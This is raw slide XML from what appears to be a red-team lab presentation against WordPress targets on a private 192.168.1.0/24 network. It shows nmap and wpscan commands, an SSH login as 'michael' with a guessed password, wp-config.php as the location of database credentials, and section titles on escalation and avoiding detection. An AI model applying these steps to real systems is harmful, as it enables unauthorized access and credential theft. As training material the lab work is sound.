              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>drwxr-xr-x 1 kali 0003 Target1_Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3D85C6"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>drwxr-xr-x 1 kali 0004 Target1_Escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3D85C6"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>drwxr-xr-x 1 kali 0005 Target2_Exploit/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3D85C6"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>drwxr-xr-x 1 kali 0006 Target2_Escalation/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3D85C6"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>drwxr-xr-x 1 kali 0007 Avoiding Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="3D85C6"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>drwxr-xr-x 1 kali 0008 Conclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>/</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218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AA84F"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>map -sS -sC -sV -Pn -O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Google Shape;74;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5522650" y="791625"/>
            <a:ext cx="28068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900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr b="1"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rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Address Range: 192.168.1.0/24</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rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Netmask: 255.255.255.0</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rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr b="1"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en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>IPv4: 192.168.1.90</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en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>OS: Kali Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Hostname: Kali (Attacker Machine)</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Hostname: ELK STACK SERVER</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en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>IPv4: 192.168.1.105</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en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>OS: Linux</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rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Hostname: CAPSTONE</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rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>IPv4: 192.168.1.110</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rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>OS: Linux Debian 3.16.57-2</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rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Hostname: Target 1</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rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>IPv4: 192.168.1.115</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rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>OS: Linux Debian 3.16.57-2</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rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Hostname: Target 2</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2900"/>
              <a:buFont typeface="Arial"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Google Shape;75;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="920800" y="791625"/>
            <a:ext cx="4302765" cy="41665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311700" y="290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D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Recon/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>T1_Recon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>.md</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Google Shape;81;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285950" y="863550"/>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1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>nmap -sS -sV -sC -Pn -O 192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82" name="Google Shape;82;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097187" y="1203350"/>
            <a:ext cx="6898125" cy="3753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6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>eog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t> Red_Team/Target1_Exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>T1_wpscan.md</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88" name="Google Shape;88;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1556550"/>
            <a:ext cx="4046426" cy="3342975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="89" name="Google Shape;89;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499825" y="2196617"/>
            <a:ext cx="4332475" cy="1041384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1535400" y="919525"/>
            <a:ext cx="607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Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>wpscan -e --url http://192.168.1.110/wordpress</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Cod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311700" y="160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D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Target1_Exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>T1_Exploit.md</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="771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solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>michael@192.168.1.105</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Password: michael</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michael@target1$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Credentials for the SQL database were found at:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>/var/www/html/wordpress/wp-config.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="999999"/>
                </a:highlight>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="999999"/>
              </a:highlight>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1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97" name="Google Shape;97;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="422876" y="2190750"/>
            <a:ext cx="6167425" cy="217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265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3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
